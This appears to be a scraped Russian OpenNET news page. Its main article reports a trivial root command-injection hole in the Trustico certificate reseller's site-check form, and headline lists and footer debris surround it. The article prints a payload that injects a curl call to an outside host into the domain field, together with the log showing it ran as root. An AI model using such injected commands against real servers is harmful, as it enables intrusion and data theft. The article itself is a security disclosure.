Лучшая похвала-это та, что исходит от человека, которому ты ничего хорошего не сделал.

Дочь учится на повара. Мать: ...

Аудит не выявил следов установки шпионских чипов в материнских платах Super Micro
Tue, 11 Dec 2018 22:07:09 +0300

Первая открытая реализация анклава для аппаратно изолированных окружений
Tue, 11 Dec 2018 13:47:41 +0300

Доля государственных фондов США в финансировании Tor снизилась с 85% до 51%
Tue, 11 Dec 2018 09:31:39 +0300

Голосование за поддержку Adobe Premiere в Linux
Mon, 10 Dec 2018 18:58:45 +0300

Microsoft официально объявил о переходе Edge на движок Chromium
Fri, 07 Dec 2018 12:11:50 +0300

Фонд СПО признал Hyperbola полностью свободным дистрибутивом
Fri, 07 Dec 2018 11:55:53 +0300

Mozilla подготовит версию Firefox, оптимизированную для архитектуры ARM64
Fri, 07 Dec 2018 09:44:39 +0300

Linux Foundation унифицирует инструментарий для проверки соблюдения открытых лицензий
Thu, 06 Dec 2018 14:15:47 +0300

Платформа Eclipse прекращает поддержку 32-разрядной архитектуры
Thu, 06 Dec 2018 10:55:16 +0300

Выпущен патч, решающий проблему с blq-mq в ядре Linux 4.19, которая приводит к потере данных
Wed, 05 Dec 2018 07:27:24 +0300

Microsoft открыл код WPF, Windows Forms и WinUI
Tue, 04 Dec 2018 21:34:15 +0300

Сообщество Handshake пожертвовало миллион долларов Фонду свободного ПО
Tue, 04 Dec 2018 11:39:44 +0300

Microsoft заменит Edge браузером на основе свободного движка Chromium
Tue, 04 Dec 2018 08:18:16 +0300

Компания NVIDIA открыла код движка симуляции физических процессов PhysX
Mon, 03 Dec 2018 23:48:01 +0300

Дополнения для обхода Paywall удалены из каталогов Chrome и Mozilla
Mon, 03 Dec 2018 09:04:08 +0300

Новости OPENNET
Новости

Вчерашняя история с отзывом 23 тысяч сертификатов, выданных через реселлера Trustico, получала неожиданное продолжение. Один из исследователей безопасности раскрыл тривиальную уязвимость в web-интерфейсе, позволяющую получить root-доступ на сервер.

Проблема свидетельствует о наплевательском отношении к безопасности и косвенно подтверждает, что действия Trustico по отзыву сертификатов были связаны с инцидентом с безопасностью, несмотря на то, что компания отвергала подобные предположения. По информации от исследователя, продемонстрировавшего уязвимость, о проблеме было известно ранее и он почерпнул сведения из публичных источников. Суть выявленной уязвимости в передаче пользовательского ввода в обработчик на shell без экранирования спецсимволов. В частности, если ввести shell-операторы в поле ввода домена в форме проверки корректности установки сертификата, то они будут исполнены на сервере с правами root.

Например, при вводе вместо имени проверяемого домена строки "$(curl http://1.2.3.4/`id`)" на хост 1.2.3.4 придёт запрос вида:


   1.2.3.4 - [02/Mar/2018:09:52:14] "GET /uid=0(root) HTTP/1.1" 404 209 "-" "curl/7.29.0"

В настоящее время сайт Trustico выведен из строя и недоступен. Пока непонятно позволял ли взломанный сервер получить доступ к архиву закрытых ключей клиентских сертификатов, но до выключения сервера одному из экспериментаторов удалось найти в конфигурации web-сервера закрытый ключ для SSL-сертификата домена "*.trustico.com", который хранился на скомпрометированном сервере.

Проблема также затронула партнёрский сайт SSLDirect.com, который размещался на том же сервере, и генерировал сертификаты через Trustico, характеризуя данную компанию как одного из ведущих мировых центров сертификации ("Trustico is one of the worlds leading SSL Certificate issuers").

Представители удостоверяющих центров DigiCert и Comodo, которые выступали в роли партнёров Trustico, пока никак не отреагировали на проблему, но в соответствии с правилами можно ожидать отзыва всех выданных через Trustico сертификатов в течение 24 часов.

При этом представители Trustico заявили, что скомпрометированный сервер не имел доступа к информационным базам, в которых хранились данные клиентов.

66.5022 75.6197 0.5882 9.6394

НОВОСТИ: Google перенёс закрытие Google+ с августа на апрель из-за выявле ... Tue, 11 Dec 2018 10:19:30 +0300

Компания Google уведомила пользователей об изменении планов по закрытию социальной сети Google+. Вместо августа 2019 года работа Google+ будет прекращена уже в апреле.

???????@Mail.ru Opera Firefox INFOBOX - хостинг Google Chrome